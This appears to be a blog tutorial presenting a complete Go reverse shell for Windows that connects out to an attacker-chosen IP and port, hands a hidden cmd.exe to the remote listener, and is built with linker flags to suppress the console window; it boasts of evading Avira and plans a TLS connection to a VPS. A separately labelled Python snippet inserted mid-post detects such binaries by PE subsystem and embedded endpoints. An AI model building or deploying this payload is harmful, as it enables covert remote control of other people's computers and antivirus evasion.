Basic reverse shell in golang (almost undetectable, hide cmd window)

Yoplux
May 11, 2021


I found it on sysdream.com

First, what is a reverse shell?

Also called a reverse tunnel, it is a technique that redirects the input and output of a shell running on a local computer to a remote computer, through a service able to relay between the two. One advantage of this technique is that it makes the local shell reachable from the remote server without being blocked by a firewall.

Let’s code it:

package main

import (
    "net"
    "os"
    "os/exec"
    "syscall"
)
  • net is required to establish the connection
  • os is required to call os.Exit()
  • os/exec is required to execute a command on the target machine
  • syscall contains an interface to the low-level operating system primitives (here, the Windows process attributes)
var connectString string

func main() {
    if len(connectString) == 0 {
        os.Exit(1)
    }
  • var connectString string is left empty in the source and set at build time; it holds the IP address and the port to connect to
    conn, err := net.Dial("tcp", connectString)
    if err != nil {
        os.Exit(1)
    }
  • net.Dial connects to the address on the named network; in our case the address is the value held in the variable connectString
    cmd := exec.Command("cmd.exe")
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
  • cmd := exec.Command("cmd.exe") creates cmd, which represents an external command being prepared or run; here it is the command cmd.exe
  • cmd.SysProcAttr is used to hide the cmd.exe window. This is the key to hiding our reverse shell, but we will need something else at compile time too!
    cmd.Stdin = conn
    cmd.Stdout = conn
    cmd.Stderr = conn
  • Redirection of the standard input, output and error of this process to the open connection we initialized above in the “conn” variable
    cmd.Run()
}
  • cmd.Run() starts the command held in the cmd variable and waits for it to complete

Here is the full code !

package main

import (
    "net"
    "os"
    "os/exec"
    "syscall" // needed for syscall.SysProcAttr below
)

// connectString is empty in the source; it is filled in at link time with -X.
var connectString string

func main() {
    if len(connectString) == 0 {
        os.Exit(1)
    }
    conn, err := net.Dial("tcp", connectString)
    if err != nil {
        os.Exit(1)
    }
    cmd := exec.Command("cmd.exe")
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    cmd.Stdin = conn
    cmd.Stdout = conn
    cmd.Stderr = conn
    cmd.Run()
}

Now we can compile it. Use your own IP address (the IP of your attacking box, which will receive the connection); in my case it is 192.168.1.32 because I am on my local network. We use port 2233 because it is not in use, but you can use any free port:

go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go
  • -ldflags passes flags to the linker, which lets you change the value of variables at build time and embed your own information into the binary
  • -H=windowsgui produces a “GUI binary” instead of a “console binary”, so Windows does not allocate a console window when it runs
  • -X writes a value into a string variable at link time; it is followed by the package path of the variable and its new value
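Both linker flags leave artifacts that a defender can check for when triaging a binary: -H=windowsgui sets the Subsystem field of the PE optional header to GUI, and -X stores the connect string as a plain string in the executable. The following Python script is an added example, not code from the post or its author; it parses those two artifacts and flags a GUI-subsystem binary that also carries a hard-coded ip:port. The PE bytes it inspects are constructed inline (header only, not a real executable), reusing the address from the build command above.

```python
import re
import struct

# PE optional-header Subsystem values (winnt.h)
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2   # what -H=windowsgui produces
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3   # a normal console binary
SUBSYSTEM_NAMES = {IMAGE_SUBSYSTEM_WINDOWS_GUI: "GUI", IMAGE_SUBSYSTEM_WINDOWS_CUI: "console"}

# dotted-quad:port, bounded so that version strings and longer digit runs do not match
IPV4_PORT = re.compile(rb"(?<![0-9.])(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})(?![0-9])")

def pe_subsystem(data: bytes) -> int:
    """Return the Subsystem field of the PE optional header (offset 68 in both PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    optional_header = e_lfanew + 4 + 20        # skip the signature and the 20-byte COFF header
    return struct.unpack_from("<H", data, optional_header + 68)[0]

def embedded_endpoints(data: bytes) -> list:
    """-X main.connectString=ip:port stores the value as a plain string; collect such strings."""
    return [f"{ip.decode()}:{port.decode()}" for ip, port in IPV4_PORT.findall(data)]

def triage(data: bytes) -> dict:
    """Flag a GUI-subsystem binary that also carries a hard-coded ip:port."""
    subsystem = pe_subsystem(data)
    endpoints = embedded_endpoints(data)
    return {
        "subsystem": SUBSYSTEM_NAMES.get(subsystem, f"other({subsystem})"),
        "endpoints": endpoints,
        "suspicious": subsystem == IMAGE_SUBSYSTEM_WINDOWS_GUI and bool(endpoints),
    }

def make_sample_pe(subsystem: int, payload: bytes) -> bytes:
    """Constructed header-only PE32+ image for testing; it is not a runnable executable."""
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)      # x64, 240-byte optional header
    optional = bytearray(240)
    struct.pack_into("<H", optional, 0, 0x20B)        # PE32+ magic
    struct.pack_into("<H", optional, 68, subsystem)
    return dos_header + b"PE\0\0" + coff + bytes(optional) + payload

# Constructed sample mimicking the post's build: GUI subsystem plus the connect string used in the article
SAMPLE = make_sample_pe(IMAGE_SUBSYSTEM_WINDOWS_GUI, b"\x00go1.16\x00192.168.1.32:2233\x00cmd.exe\x00")
```

Running triage(SAMPLE) reports subsystem "GUI", the endpoint 192.168.1.32:2233 and suspicious True; a console binary without an embedded endpoint is not flagged.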

So, let’s give it a try on a Windows VM and your favourite Linux distribution.

As you can see, I use Avira as antivirus.

You can use Netcat to listen on port 2233 to receive the connection:

Now drag and drop the reverse.exe file onto the VM and double-click it; nothing happens from the target's point of view:

If you run Get-Process to check whether reverse.exe is running, you will see that it is running without any problem; Avira did not detect anything!

Now let's take a look at our Netcat listener:

We have a shell; you can now play with it!

As I said, it is almost undetectable.

In the near future I will make the cmd run in the background and do much more, like connecting it to a VPS over a TLS-encrypted connection to try it in real conditions. You can do much more by looking at the author of this code on:

Signed Alix.
